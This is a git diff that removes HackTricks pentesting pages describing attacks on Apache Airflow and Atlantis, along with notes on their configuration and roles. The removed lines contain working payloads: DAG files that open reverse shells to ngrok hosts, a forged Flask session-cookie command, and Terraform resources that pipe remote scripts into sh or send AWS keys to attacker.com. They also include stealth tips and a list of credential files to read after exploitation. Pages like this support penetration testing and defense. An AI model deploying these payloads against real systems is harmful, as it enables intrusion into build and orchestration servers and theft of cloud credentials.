command - -# Use this command to delete it -helm delete airflow-release -``` - -# Airflow Configuration - -Airflow might store **sensitive information** in its configuration or you can find weak configurations in place: - -{% content-ref url="airflow-configuration.md" %} -[airflow-configuration.md](airflow-configuration.md) -{% endcontent-ref %} - -# Airflow RBAC - -Before start attacking Airflow you should understand **how permissions work**: - -{% content-ref url="airflow-rbac.md" %} -[airflow-rbac.md](airflow-rbac.md) -{% endcontent-ref %} - -# Attacks - -## Web Console Enumeration - -If you have **access to the web console** you might be able to access some or all of the following information: - -* **Variables** (Custom sensitive information might be stored here) -* **Connections** (Custom sensitive information might be stored here) -* [**Configuration**](./#airflow-configuration) (Sensitive information like the **`secret_key`** and passwords might be stored here) -* List **users & roles** -* **Code of each DAG** (which might contain interesting info) - -## Privilege Escalation - -If the **`expose_config`** configuration is set to **True**, from the **role User** and **upwards** can **read** the **config in the web**. In this config, the **`secret_key`** appears, which means any user with this valid they can **create its own signed cookie to impersonate any other user account**. - -```bash -flask-unsign --sign --secret '' --cookie "{'_fresh': True, '_id': '12345581593cf26619776d0a1e430c412171f4d12a58d30bef3b2dd379fc8b3715f2bd526eb00497fcad5e270370d269289b65720f5b30a39e5598dad6412345', '_permanent': True, 'csrf_token': '09dd9e7212e6874b104aad957bbf8072616b8fbc', 'dag_status_filter': 'all', 'locale': 'en', 'user_id': '1'}" -``` - -## DAG Backdoor (RCE in Airflow worker) - -If you have **write access** to the place where the **DAGs are saved**, you can just **create one** that will send you a **reverse shell.**\ -Note that this reverse shell is going to be executed inside an **airflow worker container**: - -```python -import pendulum -from airflow import DAG -from airflow.operators.bash import BashOperator - -with DAG( - dag_id='rev_shell_bash', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = BashOperator( - task_id='run', - bash_command='bash -i >& /dev/tcp/8.tcp.ngrok.io/11433 0>&1', - ) -``` - -```python -import pendulum, socket, os, pty -from airflow import DAG -from airflow.operators.python import PythonOperator - -def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") - -with DAG( - dag_id='rev_shell_python', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = PythonOperator( - task_id='rs_python', - python_callable=rs, - op_kwargs={"rhost":"8.tcp.ngrok.io", "port": 11433} - ) -``` - -## DAG Backdoor (RCE in Airflow scheduler) - -If you set something to be **executed in the root of the code**, at the moment of this writing, it will be **executed by the scheduler** after a couple of seconds after placing it inside the DAG's folder. - -```python -import pendulum, socket, os, pty -from airflow import DAG -from airflow.operators.python import PythonOperator - -def rs(rhost, port): - s = socket.socket() - s.connect((rhost, port)) - [os.dup2(s.fileno(),fd) for fd in (0,1,2)] - pty.spawn("/bin/sh") - -rs("2.tcp.ngrok.io", 14403) - -with DAG( - dag_id='rev_shell_python2', - schedule_interval='0 0 * * *', - start_date=pendulum.datetime(2021, 1, 1, tz="UTC"), -) as dag: - run = PythonOperator( - task_id='rs_python2', - python_callable=rs, - op_kwargs={"rhost":"2.tcp.ngrok.io", "port": 144} -``` - -## DAG Creation - -If you manage to **compromise a machine inside the DAG cluster**, you can create new **DAGs scripts** in the `dags/` folder and they will be **replicated in the rest of the machines** inside the DAG cluster. - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/apache-airflow/airflow-configuration.md b/cloud-security/apache-airflow/airflow-configuration.md deleted file mode 100644 index ae4e65f9e..000000000 --- a/cloud-security/apache-airflow/airflow-configuration.md +++ /dev/null @@ -1,143 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# Configuration File - -**Apache Airflow** generates a **config file** in all the airflow machines called **`airflow.cfg`** in the home of the airflow user. This config file contains configuration information and **might contain interesting and sensitive information.** - -**There are two ways to access this file: By compromising some airflow machine, or accessing the web console.** - -Note that the **values inside the config file** **might not be the ones used**, as you can overwrite them setting env variables such as `AIRFLOW__WEBSERVER__EXPOSE_CONFIG: 'true'`. - -If you have access to the **config file in the web server**, you can check the **real running configuration** in the same page the config is displayed.\ -If you have **access to some machine inside the airflow env**, check the **environment**. - -Some interesting values to check when reading the config file: - -## \[api] - -* **`access_control_allow_headers`**: This indicates the **allowed** **headers** for **CORS** -* **`access_control_allow_methods`**: This indicates the **allowed methods** for **CORS** -* **`access_control_allow_origins`**: This indicates the **allowed origins** for **CORS** -* **`auth_backend`**: [**According to the docs**](https://airflow.apache.org/docs/apache-airflow/stable/security/api.html) a few options can be in place to configure who can access to the API: - * `airflow.api.auth.backend.deny_all`: **By default nobody** can access the API - * `airflow.api.auth.backend.default`: **Everyone can** access it without authentication - * `airflow.api.auth.backend.kerberos_auth`: To configure **kerberos authentication** - * `airflow.api.auth.backend.basic_auth`: For **basic authentication** - * `airflow.composer.api.backend.composer_auth`: Uses composers authentication (GCP) (from [**here**](https://cloud.google.com/composer/docs/access-airflow-api)). - * `composer_auth_user_registration_role`: This indicates the **role** the **composer user** will get inside **airflow** (**Op** by default). - * You can also **create you own authentication** method with python. -* **`google_key_path`:** Path to the **GCP service account key** - -## **\[atlas]** - -* **`password`**: Atlas password -* **`username`**: Atlas username - -## \[celery] - -* **`flower_basic_auth`** : Credentials (_user1:password1,user2:password2_) -* **`result_backend`**: Postgres url which may contain **credentials**. -* **`ssl_cacert`**: Path to the cacert -* **`ssl_cert`**: Path to the cert -* **`ssl_key`**: Path to the key - -## \[core] - -* **`dag_discovery_safe_mode`**: Enabled by default. When discovering DAGs, ignore any files that don’t contain the strings `DAG` and `airflow`. -* **`fernet_key`**: Key to store encrypted variables (symmetric) -* **`hide_sensitive_var_conn_fields`**: Enabled by default, hide sensitive info of connections. -* **`security`**: What security module to use (for example kerberos) - -## \[dask] - -* **`tls_ca`**: Path to ca -* **`tls_cert`**: Part to the cert -* **`tls_key`**: Part to the tls key - -## \[kerberos] - -* **`ccache`**: Path to ccache file -* **`forwardable`**: Enabled by default - -## \[logging] - -* **`google_key_path`**: Path to GCP JSON creds. - -## \[secrets] - -* **`backend`**: Full class name of secrets backend to enable -* **`backend_kwargs`**: The backend\_kwargs param is loaded into a dictionary and passed to **init** of secrets backend class. - -## \[smtp] - -* **`smtp_password`**: SMTP password -* **`smtp_user`**: SMTP user - -## \[webserver] - -* **`cookie_samesite`**: By default it's **Lax**, so it's already the weakest possible value -* **`cookie_secure`**: Set **secure flag** on the the session cookie -* **`expose_config`**: By default is False, if true, the **config** can be **read** from the web **console** -* **`expose_stacktrace`**: By default it's True, it will show **python tracebacks** (potentially useful for an attacker) -* **`secret_key`**: This is the **key used by flask to sign the cookies** (if you have this you can **impersonate any user in Airflow**) -* **`web_server_ssl_cert`**: **Path** to the **SSL** **cert** -* **`web_server_ssl_key`**: **Path** to the **SSL** **Key** -* **`x_frame_enabled`**: Default is **True**, so by default clickjacking isn't possible - -## Web Authentication - -By default **web authentication** is specified in the file **`webserver_config.py`** and is configured as - -```bash -AUTH_TYPE = AUTH_DB -``` - -Which means that the **authentication is checked against the database**. However, other configurations are possible like - -```bash -AUTH_TYPE = AUTH_OAUTH -``` - -To leave the **authentication to third party services**. - -However, there is also an option to a**llow anonymous users access**, setting the following parameter to the **desired role**: - -```bash -AUTH_ROLE_PUBLIC = 'Admin' -``` - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/apache-airflow/airflow-rbac.md b/cloud-security/apache-airflow/airflow-rbac.md deleted file mode 100644 index 575288e30..000000000 --- a/cloud-security/apache-airflow/airflow-rbac.md +++ /dev/null @@ -1,75 +0,0 @@ - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - -# RBAC - -Airflow ships with a **set of roles by default**: **Admin**, **User**, **Op**, **Viewer**, and **Public**. **Only `Admin`** users could **configure/alter the permissions for other roles**. But it is not recommended that `Admin` users alter these default roles in any way by removing or adding permissions to these roles. - -* **`Admin`** users have all possible permissions. -* **`Public`** users (anonymous) don’t have any permissions. -* **`Viewer`** users have limited viewer permissions (only read). It **cannot see the config.** -* **`User`** users have `Viewer` permissions plus additional user permissions that allows him to manage DAGs a bit. He **can see the config file** -* **`Op`** users have `User` permissions plus additional op permissions. - -Note that **admin** users can **create more roles** with more **granular permissions**. - -Also note that the only default role with **permission to list users and roles is Admin, not even Op** is going to be able to do that. - -## Default Permissions - -These are the default permissions per default role: - -* **Admin** - -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on Roles, can read on Permissions, can delete on Roles, can edit on Roles, can create on Roles, can read on Users, can create on Users, can edit on Users, can delete on Users, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs, can read on Task Reschedules, menu access on Task Reschedules, can read on Triggers, menu access on Triggers, can read on Passwords, can edit on Passwords, menu access on List Users, menu access on Security, menu access on List Roles, can read on User Stats Chart, menu access on User's Statistics, menu access on Base Permissions, can read on View Menus, menu access on Views/Menus, can read on Permission Views, menu access on Permission on Views/Menus, can get on MenuApi, menu access on Providers, can create on XComs] - -* **Op** - -\[can delete on Connections, can read on Connections, can edit on Connections, can create on Connections, can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can delete on Pools, can read on Pools, can edit on Pools, can create on Pools, can read on Providers, can delete on Variables, can read on Variables, can edit on Variables, can create on Variables, can read on XComs, can read on DAG Code, can read on Configurations, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances, menu access on Admin, menu access on Configurations, menu access on Connections, menu access on Pools, menu access on Variables, menu access on XComs, can delete on XComs] - -* **User** - -\[can read on DAGs, can edit on DAGs, can delete on DAGs, can read on DAG Runs, can read on Task Instances, can edit on Task Instances, can delete on DAG Runs, can create on DAG Runs, can edit on DAG Runs, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances, can create on Task Instances, can delete on Task Instances] - -* **Viewer** - -\[can read on DAGs, can read on DAG Runs, can read on Task Instances, can read on Audit Logs, can read on ImportError, can read on XComs, can read on DAG Code, can read on Plugins, can read on DAG Dependencies, can read on Jobs, can read on My Password, can edit on My Password, can read on My Profile, can edit on My Profile, can read on SLA Misses, can read on Task Logs, can read on Website, menu access on Browse, menu access on DAG Dependencies, menu access on DAG Runs, menu access on Documentation, menu access on Docs, menu access on Jobs, menu access on Audit Logs, menu access on Plugins, menu access on SLA Misses, menu access on Task Instances] - -* **Public** - -\[] - - -
- -Support HackTricks and get benefits! - -- Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! - -- Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) - -- Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) - -- **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** - -- **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- - diff --git a/cloud-security/atlantis.md b/cloud-security/atlantis.md deleted file mode 100644 index c92ece0ad..000000000 --- a/cloud-security/atlantis.md +++ /dev/null @@ -1,394 +0,0 @@ -# Atlantis - -## Atlantis - -
- -Support HackTricks and get benefits! - -* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)! -* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family) -* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com) -* **Join the** [**πŸ’¬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** [**🐦**](https://github.com/carlospolop/hacktricks/tree/7af18b62b3bdc423e11444677a6a73d4043511e9/\[https:/emojipedia.org/bird/README.md)[**@carlospolopm**](https://twitter.com/carlospolopm)**.** -* **Share your hacking tricks by submitting PRs to the** [**hacktricks github repo**](https://github.com/carlospolop/hacktricks)**.** - -
- -## Basic Information - -Atlantis basically helps you to to run terraform from Pull Requests from your git server. - -![](<../.gitbook/assets/image (307) (3).png>) - -## Local Lab - -1. Go to the **atlantis releases page** in [https://github.com/runatlantis/atlantis/releases](https://github.com/runatlantis/atlantis/releases) and **download** the one that suits you. -2. Create a **personal token** (with repo access) of your **github** user -3. Execute `./atlantis testdrive` and it will create a **demo repo** you can use to **talk to atlantis** - 1. You can access the web page in 127.0.0.1:4141 - -## Atlantis Access - -### Git Server Credentials - -**Atlantis** support several git hosts such as **Github**, **Gitlab**, **Bitbucket** and **Azure DevOps**.\ -However, in order to access the repos in those platforms and perform actions, it needs to have some **privileged access granted to them** (at least write permissions).\ -[**The docs**](https://www.runatlantis.io/docs/access-credentials.html#create-an-atlantis-user-optional) encourage to create a user in these platform specifically for Atlantis, but some people might use personal accounts. - -{% hint style="warning" %} -In any case, from an attackers perspective, the **Atlantis account** is going to be one very **interesting** **to compromise**. -{% endhint %} - -### Webhooks - -Atlantis uses optionally [**Webhook secrets**](https://www.runatlantis.io/docs/webhook-secrets.html#generating-a-webhook-secret) to validate that the **webhooks** it receives from your Git host are **legitimate**. - -One way to confirm this would be to **allowlist requests to only come from the IPs** of your Git host but an easier way is to use a Webhook Secret. - -Note that unless you use a private github or bitbucket server, you will need to expose webhook endpoints to the Internet. - -{% hint style="warning" %} -Atlantis is going to be **exposing webhooks** so the git server can send it information. From an attackers perspective it would be interesting to know **if you can send it messages**. -{% endhint %} - -### Provider Credentials - -Atlantis runs Terraform by simply **executing `terraform plan` and `apply`** commands on the server **Atlantis is hosted on**. Just like when you run Terraform locally, Atlantis needs credentials for your specific provider. - -It's up to you how you [provide credentials](https://www.runatlantis.io/docs/provider-credentials.html#aws-specific-info) for your specific provider to Atlantis: - -* The Atlantis [Helm Chart](https://www.runatlantis.io/docs/deployment.html#kubernetes-helm-chart) and [AWS Fargate Module](https://www.runatlantis.io/docs/deployment.html#aws-fargate) have their own mechanisms for provider credentials. Read their docs. -* If you're running Atlantis in a cloud then many clouds have ways to give cloud API access to applications running on them, ex: - * [AWS EC2 Roles](https://registry.terraform.io/providers/hashicorp/aws/latest/docs) (Search for "EC2 Role") - * [GCE Instance Service Accounts](https://registry.terraform.io/providers/hashicorp/google/latest/docs/guides/provider\_reference) -* Many users set environment variables, ex. `AWS_ACCESS_KEY`, where Atlantis is running. -* Others create the necessary config files, ex. `~/.aws/credentials`, where Atlantis is running. -* Use the [HashiCorp Vault Provider](https://registry.terraform.io/providers/hashicorp/vault/latest/docs) to obtain provider credentials. - -{% hint style="warning" %} -The **container** where **Atlantis** is **running** will highly probably **contain privileged credentials** to the providers (AWS, GCP, Github...) that Atlantis is managing via Terraform. -{% endhint %} - -### Web Page - -By default Atlantis will run a **web page in the port 4141 in localhost**. This page just allows you to enable/disable atlantis apply and check the plan status of the repos and unlock them (it doesn't allow to modify things, so it isn't that useful). - -You probably won't find it exposed to the internet, but it looks like by default **no credentials are needed** to access it (and if they are `atlantis`:`atlantis` are the **default** ones). - -## Server Configuration - -Configuration to `atlantis server` can be specified via command line flags, environment variables, a config file or a mix of the three. - -* You can find [**here the list of flags**](https://www.runatlantis.io/docs/server-configuration.html#server-configuration) supported by Atlantis server -* You can find [**here how to transform a config option into an env var**](https://www.runatlantis.io/docs/server-configuration.html#environment-variables)\*\*\*\* - -Values are **chosen in this order**: - -1. Flags -2. Environment Variables -3. Config File - -{% hint style="warning" %} -Note that in the configuration you might find interesting values such as **tokens and passwords**. -{% endhint %} - -### Repos Configuration - -Some configurations affects **how the repos are managed**. However, it's possible that **each repo require different settings**, so there are ways to specify each repo. This is the priority order: - -1. Repo [**`/atlantis.yml`**](https://www.runatlantis.io/docs/repo-level-atlantis-yaml.html#repo-level-atlantis-yaml-config) file. This file can be used to specify how atlantis should treat the repo. However, by default some keys cannot be specified here without some flags allowing it. - 1. Probably required to be allowed by flags like `allowed_overrides` or `allow_custom_workflows` -2. \*\*\*\*[**Server Side Config**](https://www.runatlantis.io/docs/server-side-repo-config.html#server-side-config): You can pass it with the flag `--repo-config` and it's a yaml configuring new settings for each repo (regexes supported) -3. **Default** values - -**PR Protections** - -Atlantis allows to indicate if you want the **PR** to be **`approved`** by somebody else (even if that isn't set in the branch protection) and/or be \*\*`mergeable` \*\* (branch protections passed) **before running apply**. From a security point of view, to set both options a recommended. - -In case `allowed_overrides` is True, these setting can be **overwritten on each project by the `/atlantis.yml` file**. - -**Scripts** - -The repo config can **specify scripts** to run [**before**](https://www.runatlantis.io/docs/pre-workflow-hooks.html#usage) \*\*\*\* (_pre workflow hooks_) and [**after**](https://www.runatlantis.io/docs/post-workflow-hooks.html) \*\*\*\* (_post workflow hooks_) a **workflow is executed.** - -There isn't any option to allow **specifying** these scripts in the \*\*repo `/atlantis.yml` \*\* file. - -**Workflow** - -In the repo config (server side config) you can [**specify a new default workflow**](https://www.runatlantis.io/docs/server-side-repo-config.html#change-the-default-atlantis-workflow), or [**create new custom workflows**](https://www.runatlantis.io/docs/custom-workflows.html#custom-workflows)**.** You can also **specify** which **repos** can **access** the **new** ones generated.\ -\*\*\*\*Then, you can allow the **atlantis.yaml** file of each repo to **specify the workflow to use.** - -{% hint style="danger" %} -If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} - -**Conftest Policy Checking** - -Atlantis supports running **server-side** [**conftest**](https://www.conftest.dev) **policies** against the plan output. Common usecases for using this step include: - -* Denying usage of a list of modules -* Asserting attributes of a resource at creation time -* Catching unintentional resource deletions -* Preventing security risks (ie. exposing secure ports to the public) - -You can check how to configure it in [**the docs**](https://www.runatlantis.io/docs/policy-checking.html#how-it-works). - -## Atlantis Commands - -\*\*\*\*[**In the docs**](https://www.runatlantis.io/docs/using-atlantis.html#using-atlantis) you can find the options you can use to run Atlantis: - -```bash -# Get help -atlantis help - -# Run terraform plan -atlantis plan [options] -- [terraform plan flags] -#Options: -# -d directory -# -p project -# --verbose -# You can also add extra terraform options - -# Run terraform apply -atlantis apply [options] -- [terraform apply flags] -#Options: -# -d directory -# -p project -# -w workspace -# --auto-merge-disabled -# --verbose -# You can also add extra terraform options -``` - -## Attacks - -{% hint style="warning" %} -If during the exploitation you find this **error**: `Error: Error acquiring the state lock` - -You can fix it by running: - -``` -atlantis unlock #You might need to run this in a different PR -atlantis plan -- -lock=false -``` -{% endhint %} - -### Atlantis plan RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can \*\*execute `atlantis plan` \*\* (or maybe it's automatically executed) **you will be able to RCE inside the Atlantis server**. - -You can do this by making [**Atlantis load an external data source**](https://registry.terraform.io/providers/hashicorp/external/latest/docs/data-sources/data\_source). Just put a payload like the following in the `main.tf` file: - -```json -data "external" "example" { - program = ["sh", "-c", "curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh"] -} -``` - -**Stealthier Attack** - -You can perform this attack even in a **stealthier way**, by following this suggestions: - -* Instead of adding the rev shell directly into the terraform file, you can **load an external resource** that contains the rev shell: - -```javascript -module "not_rev_shell" { - source = "git@github.com:carlospolop/terraform_external_module_rev_shell//modules" -} -``` - -You can find the rev shell code in [https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules](https://github.com/carlospolop/terraform\_external\_module\_rev\_shell/tree/main/modules) - -* In the external resource, use the **ref** feature to hide the **terraform rev shell code in a branch** inside of the repo, something like: `git@github.com:carlospolop/terraform_external_module_rev_shell//modules?ref=b401d2b` -* **Instead** of creating a **PR to master** to trigger Atlantis, **create 2 branches** (test1 and test2) and create a **PR from one to the other**. When you have completed the attack, just **remove the PR and the branches**. - -### Atlantis apply RCE - Config modification in new PR - -If you have write access over a repository you will be able to create a new branch on it and generate a PR. If you can **execute `atlantis apply` you will be able to RCE inside the Atlantis server**. - -However, you will usually need to bypass some protections: - -* **Mergeable**: If this protection is set in Atlantis, you can only run **`atlantis apply` if the PR is mergeable** (which means that the branch protection need to be bypassed). - * Check potential [**branch protections bypasses**](github-security/#branch-protection-bypass)\*\*\*\* -* **Approved**: If this protection is set in Atlantis, some **other user must approve the PR** before you can run `atlantis apply` - * By default you can abuse the [**Gitbot token to bypass this protection**](github-security/#github\_token)\*\*\*\* - -Running **`terraform apply` on a malicious Terraform file with** [**local-exec**](https://www.terraform.io/docs/provisioners/local-exec.html)**.**\ -\*\*\*\* You just need to make sure some payload like the following ones ends in the `main.tf` file: - -```json -// Payload 1 to just steal a secret -resource "null_resource" "secret_stealer" { - provisioner "local-exec" { - command = "curl https://attacker.com?access_key=$AWS_ACCESS_KEY&secret=$AWS_SECRET_KEY" - } -} - -// Payload 2 to get a rev shell -resource "null_resource" "rev_shell" { - provisioner "local-exec" { - command = "sh -c 'curl https://reverse-shell.sh/8.tcp.ngrok.io:12946 | sh'" - } -} -``` - -Follow the **suggestions from the previous technique** the perform this attack in a **stealthier way**. - -### Terraform Param Injection - -When running `atlantis plan` or `atlantis apply` terraform is being run under-needs, you can pass commands to terraform from atlantis commenting something like: - -```bash -atlantis plan -- -atlantis plan -- -h #Get terraform plan help - -atlantis apply -- -atlantis apply -- -h #Get terraform apply help -``` - -Something you can pass are env variables which might be helpful to bypass some protections. Check terraform env vars in [https://www.terraform.io/cli/config/environment-variables](https://www.terraform.io/cli/config/environment-variables) - -### Custom Workflow - -Running **malicious custom build commands** specified in an `atlantis.yaml` file. Atlantis uses the `atlantis.yaml` file from the pull request branch, **not** of `master`.\ -This possibility was mentioned in a previous section: - -{% hint style="danger" %} -If the flag \*\*\*\* `allow_custom_workflows` is set to **True**, workflows can be **specified** in the **`atlantis.yaml`** file of each repo.\ -This will basically give **RCE in the Atlantis server to any user that can access that repo**. - -```yaml -# atlantis.yaml -version: 3 -projects: -- dir: . - workflow: custom1 -workflows: - custom1: - plan: - steps: - - init - - run: my custom plan command - apply: - steps: - - run: my custom apply command -``` -{% endhint %} - -### PR Hijacking - -If someone sends **`atlantis plan/apply` comments on your valid pull requests,** it will cause terraform to run when you don't want it to. - -Moreover, if you don't have configured in the **branch protection** to ask to **reevaluate** every PR when a **new commit is pushed** to it, someone could **write malicious configs** (check previous scenarios) in the terraform config, run `atlantis plan/apply` and gain RCE. - -This is the **setting** in Github branch protections: - -![](<../.gitbook/assets/image (307) (4).png>) - -### Webhook Secret - -If you manage to **steal the webhook secret** used or if there **isn't any webhook secret** being used, you could **call the Atlantis webhook** and **invoke atlatis commands** directly. - -### Bitbucket - -Bitbucket Cloud does **not support webhook secrets**. This could allow attackers to **spoof requests from Bitbucket**. Ensure you are allowing only Bitbucket IPs. - -* This means that an **attacker** could make **fake requests to Atlantis** that look like they're coming from Bitbucket. -* If you are specifying `--repo-allowlist` then they could only fake requests pertaining to those repos so the most damage they could do would be to plan/apply on your own repos. -* To prevent this, allowlist [Bitbucket's IP addresses](https://confluence.atlassian.com/bitbucket/what-are-the-bitbucket-cloud-ip-addresses-i-should-use-to-configure-my-corporate-firewall-343343385.html) (see Outbound IPv4 addresses). - -## Post-Exploitation - -If you managed to get access to the server or at least you got a LFI there are some interesting things you should try to read: - -* `/home/atlantis/.git-credentials` Contains vcs access credentials -* `/atlantis-data/atlantis.db` Contains vcs access credentials with more info -* `/atlantis-data/repos/`_`/`_`////.terraform/terraform.tfstate` Terraform stated file - * Example: /atlantis-data/repos/ghOrg\_/\_myRepo/20/default/env/prod/.terraform/terraform.tfstate -* `/proc/1/environ` Env variables -* `/proc/[2-20]/cmdline` Cmd line of `atlantis server` (may contain sensitive data) - -## Mitigations - -### Don't Use On Public Repos - -Because anyone can comment on public 